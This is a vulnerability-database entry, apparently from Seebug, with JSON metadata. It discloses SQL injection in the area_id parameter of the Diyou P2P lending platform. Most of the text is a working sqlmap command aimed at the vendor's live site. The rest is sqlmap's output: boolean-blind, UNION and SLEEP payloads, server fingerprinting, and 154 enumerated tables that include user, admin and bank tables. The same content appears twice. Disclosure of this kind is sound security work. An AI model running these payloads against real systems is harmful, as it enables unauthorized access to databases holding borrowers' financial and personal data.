Description
### 简要描述:
=。=
### 详细说明:
模块:省市信息联动插件(通杀V4.0,3.1)
基于后台读数据库出数据的省市信息联动插件,省市区变量直接转int即可!
Location:./?plugins&q=areas&area_id=174
http://www.diyou.cc/?plugins&q=areas&area_id=174
GET参数area_id未有效过滤导致存在注入
通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复!
```
python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.cc
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: area_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: plugins&q=areas&area_id=174 AND 8880=8880
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: plugins&q=areas&area_id=174 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] www.diyou.cc
Database: www.diyou.cc
[154 tables]
+-----------------------------+
| diyou_account |
| diyou_account_balance |
| diyou_account_bank |
| diyou_account_cash |
| diyou_account_fee |
| diyou_account_fee_type |
| diyou_account_log |
| diyou_account_payment |
| diyou_account_recharge |
| diyou_account_users |
| diyou_account_users_bank |
| diyou_account_web |
| diyou_approve |
| diyou_approve_edu |
| diyou_approve_edu_id5 |
| diyou_approve_id5 |
| diyou_approve_realname |
| diyou_approve_sms |
| diyou_approve_smslog |
| diyou_approve_video |
| diyou_areas |
| diyou_articles |
| diyou_articles_pages |
| diyou_articles_type |
| diyou_attestations |
| diyou_attestations_type |
| diyou_attestations_user |
| diyou_borrow |
| diyou_borrow_activity |
| diyou_borrow_amount |
| diyou_borrow_amount_apply |
| diyou_borrow_amount_log |
| diyou_borrow_amount_type |
| diyou_borrow_apply |
| diyou_borrow_auto |
| diyou_borrow_autolog |
| diyou_borrow_care |
| diyou_borrow_change |
| diyou_borrow_count |
| diyou_borrow_count_log |
| diyou_borrow_credit |
| diyou_borrow_fee |
| diyou_borrow_fee_loan |
| diyou_borrow_fee_log |
| diyou_borrow_fee_type |
| diyou_borrow_flag |
| diyou_borrow_frost |
| diyou_borrow_newtype |
| diyou_borrow_preview |
| diyou_borrow_recover |
| diyou_borrow_repay |
| diyou_borrow_roam |
| diyou_borrow_style |
| diyou_borrow_tender |
| diyou_borrow_tender_auto |
| diyou_borrow_tender_autolog |
| diyou_borrow_tender_web |
| diyou_borrow_type |
| diyou_borrow_verify |
| diyou_borrow_vouch |
| diyou_borrow_vouch_recover |
| diyou_borrow_vouch_repay |
| diyou_comment |
| diyou_comments |
| diyou_credit |
| diyou_credit_class |
| diyou_credit_log |
| diyou_credit_rank |
| diyou_credit_type |
| diyou_dw_activity_review |
| diyou_email |
| diyou_email_log |
| diyou_email_port |
| diyou_email_sendlog |
| diyou_group |
| diyou_group_articles |
| diyou_group_comments |
| diyou_group_log |
| diyou_group_member |
| diyou_group_type |
| diyou_linkages |
| diyou_linkages_class |
| diyou_linkages_type |
| diyou_links |
| diyou_links_type |
| diyou_message |
| diyou_message_receive |
| diyou_modules |
| diyou_phone |
| diyou_phone_log |
| diyou_phone_port |
| diyou_phone_smslog |
| diyou_rating_assets |
| diyou_rating_company |
| diyou_rating_contact |
| diyou_rating_educations |
| diyou_rating_finance |
| diyou_rating_houses |
| diyou_rating_info |
| diyou_rating_job |
| diyou_remind |
| diyou_remind_log |
| diyou_remind_type |
| diyou_remind_user |
| diyou_scrollpic |
| diyou_scrollpic_type |
| diyou_site |
| diyou_site_menu |
| diyou_sms_type |
| diyou_spread_add |
| diyou_spread_log |
| diyou_spreads_log |
| diyou_spreads_set |
| diyou_spreads_users |
| diyou_sysauto_auto |
| diyou_sysauto_log |
| diyou_system |
| diyou_system_type |
| diyou_trust |
| diyou_trust_borrow |
| diyou_trust_cash |
| diyou_trust_gopay |
| diyou_trust_ips |
| diyou_trust_recharge |
| diyou_trust_repay |
| diyou_trust_tender |
| diyou_ucenter |
| diyou_ucenter_set |
| diyou_users |
| diyou_users_admin |
| diyou_users_admin_login |
| diyou_users_admin_type |
| diyou_users_adminlog |
| diyou_users_care |
| diyou_users_care_user |
| diyou_users_email |
| diyou_users_email_log |
| diyou_users_examines |
| diyou_users_friends |
| diyou_users_friends_invite |
| diyou_users_friends_type |
| diyou_users_info |
| diyou_users_log |
| diyou_users_qq |
| diyou_users_rebut |
| diyou_users_reglog |
| diyou_users_return_log |
| diyou_users_set |
| diyou_users_sina |
| diyou_users_type |
| diyou_users_upfiles |
| diyou_users_vip |
| diyou_users_viplog |
| diyou_users_visit |
+-----------------------------+
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg" alt="QQ图片20140514000027.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg)
{"href": "https://www.seebug.org/vuldb/ssvid-95419", "status": "details", "bulletinFamily": "exploit", "modified": "2014-05-15T00:00:00", "title": "\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edfSQL\u6ce8\u5165\u901a\u6740#1", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "", "cvelist": [], "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n=\u3002=\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n\u6a21\u5757\uff1a\u7701\u5e02\u4fe1\u606f\u8054\u52a8\u63d2\u4ef6\uff08\u901a\u6740V4.0,3.1\uff09\n\u57fa\u4e8e\u540e\u53f0\u8bfb\u6570\u636e\u5e93\u51fa\u6570\u636e\u7684\u7701\u5e02\u4fe1\u606f\u8054\u52a8\u63d2\u4ef6\uff0c\u7701\u5e02\u533a\u53d8\u91cf\u76f4\u63a5\u8f6cint\u5373\u53ef\uff01\nLocation:./?plugins&q=areas&area_id=174\nhttp://www.diyou.cc/?plugins&q=areas&area_id=174\nGET\u53c2\u6570area_id\u672a\u6709\u6548\u8fc7\u6ee4\u5bfc\u81f4\u5b58\u5728\u6ce8\u5165\n\u901a\u77e5\u5b58\u5728\u6ce8\u5165\u70b9\uff0c\u672a\u505a\u8fdb\u4e00\u6b65\u6d4b\u8bd5\uff0c\u8d76\u7d27\u8d76\u7d27\u8d76\u7d27\u4fee\u590d\uff01\n\n\n```\npython sqlmap.py -u \"http://www.diyou.cc/?plugins&q=areas&area_id=174\" -p \"area_id\" --batch --dbs --tables -D www.diyou.cc\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: area_id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: plugins&q=areas&area_id=174 AND 8880=8880\n Type: UNION query\n Title: MySQL UNION query (NULL) - 9 columns\n Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: plugins&q=areas&area_id=174 AND SLEEP(5)\n---\nweb server operating system: Linux Debian 6.0 (squeeze)\nweb application technology: PHP 5.3.3, Apache 2.2.16\nback-end DBMS: MySQL 5.0.11\navailable databases [2]:\n[*] information_schema\n[*] www.diyou.cc\nDatabase: www.diyou.cc\n[154 tables]\n+-----------------------------+\n| diyou_account |\n| diyou_account_balance |\n| diyou_account_bank |\n| diyou_account_cash |\n| diyou_account_fee |\n| diyou_account_fee_type |\n| diyou_account_log |\n| diyou_account_payment |\n| diyou_account_recharge |\n| diyou_account_users |\n| diyou_account_users_bank |\n| diyou_account_web |\n| diyou_approve |\n| diyou_approve_edu |\n| diyou_approve_edu_id5 |\n| diyou_approve_id5 |\n| diyou_approve_realname |\n| diyou_approve_sms |\n| diyou_approve_smslog |\n| diyou_approve_video |\n| diyou_areas |\n| diyou_articles |\n| diyou_articles_pages |\n| diyou_articles_type |\n| diyou_attestations |\n| diyou_attestations_type |\n| diyou_attestations_user |\n| diyou_borrow |\n| diyou_borrow_activity |\n| diyou_borrow_amount |\n| diyou_borrow_amount_apply |\n| diyou_borrow_amount_log |\n| diyou_borrow_amount_type |\n| diyou_borrow_apply |\n| diyou_borrow_auto |\n| diyou_borrow_autolog |\n| diyou_borrow_care |\n| diyou_borrow_change |\n| diyou_borrow_count |\n| diyou_borrow_count_log |\n| diyou_borrow_credit |\n| diyou_borrow_fee |\n| diyou_borrow_fee_loan |\n| diyou_borrow_fee_log |\n| diyou_borrow_fee_type |\n| diyou_borrow_flag |\n| diyou_borrow_frost |\n| diyou_borrow_newtype |\n| diyou_borrow_preview |\n| diyou_borrow_recover |\n| diyou_borrow_repay |\n| diyou_borrow_roam |\n| diyou_borrow_style |\n| diyou_borrow_tender |\n| diyou_borrow_tender_auto |\n| diyou_borrow_tender_autolog |\n| diyou_borrow_tender_web |\n| diyou_borrow_type |\n| diyou_borrow_verify |\n| diyou_borrow_vouch |\n| diyou_borrow_vouch_recover |\n| diyou_borrow_vouch_repay |\n| diyou_comment |\n| diyou_comments |\n| diyou_credit |\n| diyou_credit_class |\n| diyou_credit_log |\n| diyou_credit_rank |\n| diyou_credit_type |\n| diyou_dw_activity_review |\n| diyou_email |\n| diyou_email_log |\n| diyou_email_port |\n| diyou_email_sendlog |\n| diyou_group |\n| diyou_group_articles |\n| diyou_group_comments |\n| diyou_group_log |\n| diyou_group_member |\n| diyou_group_type |\n| diyou_linkages |\n| diyou_linkages_class |\n| diyou_linkages_type |\n| diyou_links |\n| diyou_links_type |\n| diyou_message |\n| diyou_message_receive |\n| diyou_modules |\n| diyou_phone |\n| diyou_phone_log |\n| diyou_phone_port |\n| diyou_phone_smslog |\n| diyou_rating_assets |\n| diyou_rating_company |\n| diyou_rating_contact |\n| diyou_rating_educations |\n| diyou_rating_finance |\n| diyou_rating_houses |\n| diyou_rating_info |\n| diyou_rating_job |\n| diyou_remind |\n| diyou_remind_log |\n| diyou_remind_type |\n| diyou_remind_user |\n| diyou_scrollpic |\n| diyou_scrollpic_type |\n| diyou_site |\n| diyou_site_menu |\n| diyou_sms_type |\n| diyou_spread_add |\n| diyou_spread_log |\n| diyou_spreads_log |\n| diyou_spreads_set |\n| diyou_spreads_users |\n| diyou_sysauto_auto |\n| diyou_sysauto_log |\n| diyou_system |\n| diyou_system_type |\n| diyou_trust |\n| diyou_trust_borrow |\n| diyou_trust_cash |\n| diyou_trust_gopay |\n| diyou_trust_ips |\n| diyou_trust_recharge |\n| diyou_trust_repay |\n| diyou_trust_tender |\n| diyou_ucenter |\n| diyou_ucenter_set |\n| diyou_users |\n| diyou_users_admin |\n| diyou_users_admin_login |\n| diyou_users_admin_type |\n| diyou_users_adminlog |\n| diyou_users_care |\n| diyou_users_care_user |\n| diyou_users_email |\n| diyou_users_email_log |\n| diyou_users_examines |\n| diyou_users_friends |\n| diyou_users_friends_invite |\n| diyou_users_friends_type |\n| diyou_users_info |\n| diyou_users_log |\n| diyou_users_qq |\n| diyou_users_rebut |\n| diyou_users_reglog |\n| diyou_users_return_log |\n| diyou_users_set |\n| diyou_users_sina |\n| diyou_users_type |\n| diyou_users_upfiles |\n| diyou_users_vip |\n| diyou_users_viplog |\n| diyou_users_visit |\n+-----------------------------+\n```\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg\" alt=\"QQ\u56fe\u724720140514000027.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg)", "viewCount": 6, "published": "2014-05-15T00:00:00", "sourceData": "", "id": "SSV:95419", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:25:45", "reporter": "Root", "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645286065, "score": 1659785532, "epss": 1678850553}}
{}
帝友P2P借贷系统SQL注入通杀#1